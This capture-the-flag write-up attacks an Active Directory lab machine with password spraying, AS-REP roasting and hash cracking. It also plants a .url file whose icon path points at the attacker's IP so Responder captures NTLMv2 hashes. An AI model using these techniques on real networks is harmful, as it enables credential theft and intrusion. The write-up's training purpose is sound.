#tryhackme #activedirectory #hard # Information Gathering - Nmap I began with scanning all TCP ports with Nmap. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ sudo nmap -sS $IP -Pn -n --open --min-rate 3000 -p- Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-20 13:11 EDT Nmap scan report for 10.10.94.108 Host is up (0.20s latency). Not shown: 65513 filtered tcp ports (no-response) Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE 53/tcp open domain 88/tcp open kerberos-sec 135/tcp open msrpc 139/tcp open netbios-ssn 389/tcp open ldap 445/tcp open microsoft-ds 464/tcp open kpasswd5 593/tcp open http-rpc-epmap 636/tcp open ldapssl 3268/tcp open globalcatLDAP 3269/tcp open globalcatLDAPssl 3389/tcp open ms-wbt-server 5985/tcp open wsman 7680/tcp open pando-pub 9389/tcp open adws 49669/tcp open unknown 49670/tcp open unknown 49671/tcp open unknown 49673/tcp open unknown 49676/tcp open unknown 49702/tcp open unknown 52619/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 43.99 seconds ``` Then I ran one more Nmap scan against the open ports found but this time with `-sCV` options for more detailed information. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap -sCV $IP -p 53,88,135,139,389,445,464,593,636,3268,3269,3389,5985,7680,9389,52619 Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-20 13:18 EDT Nmap scan report for 10.10.94.108 Host is up (0.20s latency). PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-07-20 17:18:18Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: thm.corp0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: thm.corp0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 3389/tcp open ms-wbt-server Microsoft Terminal Services |_ssl-date: 2025-07-20T17:19:50+00:00; 0s from scanner time. | rdp-ntlm-info: | Target_Name: THM | NetBIOS_Domain_Name: THM | NetBIOS_Computer_Name: HAYSTACK | DNS_Domain_Name: thm.corp | DNS_Computer_Name: HayStack.thm.corp | DNS_Tree_Name: thm.corp | Product_Version: 10.0.17763 |_ System_Time: 2025-07-20T17:19:09+00:00 | ssl-cert: Subject: commonName=HayStack.thm.corp | Not valid before: 2025-07-19T17:01:22 |_Not valid after: 2026-01-18T17:01:22 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 7680/tcp filtered pando-pub 9389/tcp open mc-nmf .NET Message Framing 52619/tcp open msrpc Microsoft Windows RPC Service Info: Host: HAYSTACK; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-time: | date: 2025-07-20T17:19:13 |_ start_date: N/A | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 106.45 seconds ``` Lastly, a UDP scan against top 10 ports ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap -sU $IP --min-rate 3000 --top-ports 10 Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-20 13:22 EDT Nmap scan report for 10.10.94.108 Host is up (0.22s latency). PORT STATE SERVICE 53/udp open domain 67/udp open|filtered dhcps 123/udp open ntp 135/udp open|filtered msrpc 137/udp open|filtered netbios-ns 138/udp open|filtered netbios-dgm 161/udp open|filtered snmp 445/udp open|filtered microsoft-ds 631/udp open|filtered ipp 1434/udp open|filtered ms-sql-m Nmap done: 1 IP address (1 host up) scanned in 2.19 seconds ``` # Enumeration ##### Port 139 445 - SMB I usually try to enumerate the file share protocols first. I tried to see if I could list SMB shares using `smbclient` and this share `Data` stood out to me because it's not a default share. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ smbclient -N -L //$IP Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share Data Disk IPC$ IPC Remote IPC NETLOGON Disk Logon server share SYSVOL Disk Logon server share Reconnecting with SMB1 for workgroup listing. do_connect: Connection to 10.10.94.108 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) Unable to connect with SMB1 -- no workgroup available ``` Inside the share, there was a directory and I've downloaded every files in it. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ smbclient -N //$IP/Data Try "help" to get a list of possible commands. smb: \> dir . D 0 Wed Jul 19 04:40:57 2023 .. D 0 Wed Jul 19 04:40:57 2023 onboarding D 0 Sun Jul 20 13:24:25 2025 7863807 blocks of size 4096. 3002300 blocks available smb: \> ``` One of the files I downloaded revealed an important information: an initial password for `Lily Oneill`'s company account. ![[Pasted image 20250720123428.png]] `nxc smb thm.corp -u guest -p '' --rid-brute | grep SidTypeUser` command reveals- there exists the user `LILY ONEILL` with the username `LILY_ONEILL`. ![[Pasted image 20250720131821.png]] ResetMe123! Filtered only usernames and saved them to a file. ![[Pasted image 20250720132750.png]] Then I'll confirm if these users actually do exist and are valid with `Kerbrute`. ![[Pasted image 20250720135043.png]] I performed a Password Spraying with the username list and the password I found earlier against smb protocol and I found `LILY_ONEILL` again but the user didn't appear to have any privileges other than guest, which means we need to keep enumerating. # Exploitation - Initial Access Then I performed AS-REP Roasting with `Impacket GetNPUsers.py` against the users list I created to find users who have `pre-authentication` setting disabled and obtained 3 hashes for users: `Ernesto Silva`, `Tabatha Britt`, and `Leann Long`. ![[Pasted image 20250720141210.png]] `Hashcat` cracked the hash of user `Tabatha Britt`. ![[Pasted image 20250720142844.png]] Because now we know the valid credentials, we can try open up a RDP server using `xfreerdp3`. I was successfully logged in as `tabatha_britt`. However, I couldn't find much information in the system as `tabatha_britt`. Let's keep enumerating. ![[Pasted image 20250720143208.png]] I recalled we had both `READ` and `WRITE` permissions to the SMB `Data` share. I am going to attempt SCF File Attack since we have the write permissions to the Data share. ![[Pasted image 20250720145316.png]] I generated `.url` file which is going to be our payload uploaded to the share. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ cat icon.url [InternetShortcut] URL=any WorkingDirectory=any IconFile=\\10.13.89.243\%USERNAME%.icon IconIndex=1 ``` I fired up `responder` to listening for events, particularly someone accessing the share. Then I uploaded our `.url` file inside the `onboarding` directory. ```bash smb: \> cd onboarding smb: \onboarding\> dir . D 0 Sun Jul 20 16:40:58 2025 .. D 0 Sun Jul 20 16:40:58 2025 ejgs0yxf.uip.pdf A 3032659 Mon Jul 17 04:12:09 2023 icon.url A 100 Sun Jul 20 16:37:57 2025 obsuye24.tef.pdf A 4700896 Mon Jul 17 04:11:53 2023 yismddkx.0rv.txt A 521 Mon Aug 21 14:21:59 2023 7863807 blocks of size 4096. 3009154 blocks available ``` After I uploaded the `.url` file, within seconds, my responder listener captured a `NTLMv2 Hash` ![[Pasted image 20250720153918.png]] `hashcat` uses mode 5600 for `NTLMv2` hash. I successfully cracked the hash and obtained the password. ![[Pasted image 20250720154950.png]] `nxc` reveals the credentials of user `automate` is valid against WINRM. ![[Pasted image 20250720155327.png]] Successfully logged into the system as user `automate` via `evil-winrm` ![[Pasted image 20250720155521.png]] Found `user.txt` in `C:\Users\automate\Desktop` ![[Pasted image 20250720155617.png]] # Privilege Escalation I spent quite amount of time enumerating information in the remote Windows system but I couldn't. Since it's an AD-based room, I'll use `bloodhound-python` in my local kali to map out the target and hopefully enumerate some attack vectors for privesc. ![[Pasted image 20250720202729.png]] Upload our `.zip` file generated from the `bloodhound-python` collector. ![[Pasted image 20250720204008.png]] After exploring the map for a while, I found that one of the users I discovered earlier, `TABATHA_BRITT` has `GenericAll` privileges over two users: `SHAWNA_BRAY` and `RAQUEL_BENSON`. Simply put, `GenericAll` privileges indicate `TABATHA_BRITT` has full control over those users. ![[Pasted image 20250720204810.png]] ![[Pasted image 20250720205132.png]] Moreover, `SHAWNA_BRAY` has the capability to change `CRUZ_HALL`'s password. ![[Pasted image 20250720210106.png]] Finally `CRUZ_HALL` has `GenericWrite` and `ForceChangePassword` privileges over `DARLA_WINTERS` ![[Pasted image 20250720210226.png]] We have a handful of users whose passwords we are going to change. Let's get to work.